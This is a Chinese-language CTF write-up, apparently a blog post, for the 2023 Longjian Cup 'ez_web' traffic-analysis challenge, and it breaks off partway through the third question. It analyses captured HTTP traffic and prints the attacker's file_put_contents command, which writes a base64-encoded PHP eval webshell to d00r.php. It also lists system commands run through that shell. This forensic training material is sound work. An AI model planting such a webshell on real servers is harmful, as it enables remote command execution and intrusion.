2023陇剑杯-流量分析篇(全)-wp详细

1.ez_web

Q1:服务器自带的后门文件是什么?
常用http过滤命令:
    http.request.full_uri
    http.request.method==POST

        查看第一个POST请求,发现关键点file_put_contents(备注:file_put_contents内置函数,用于将字符串写入文件)分析可知,攻击者首先通过ViewMore.php写入一句话木马d00r.php,然后通过d00r.php执行系统命令,具体分析如下:

file_put_contents('d00r.php', base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg=='));,

file_put_contents 函数将经过Base64编码的PHP代码写入到一个名为'd00r.php'的文件中。 PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg== base64解码后对应的PHP代码为

<?php eval($_POST['cmd']);?>(经典的php一句话木马)

然后通过一句话木马文件d00r.php执行whoami,ls等一系列系统命令。

因此服务器自带的后门文件是ViewMore.php。

Q2:服务器的内网IP是什么?

如下所示:第22251个流,追踪http数据流,

查看ipconfig的回显,发现内网ip地址为:192.168.101.132

Q3:攻击者往服务器中写入的key是什么?

追踪http数据流,将cmd执行命令进行url解码,分析可知file_put_contents 函数将解码得到的数据写入到名为k3y_f1le的文件中,

base64解码发现:PK开头,直接保存为1.zip 

压缩文件存在密码?

继续查看POST请求包,追踪23473流发现执行了cat /passwd命令,猜测响应值为密码

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值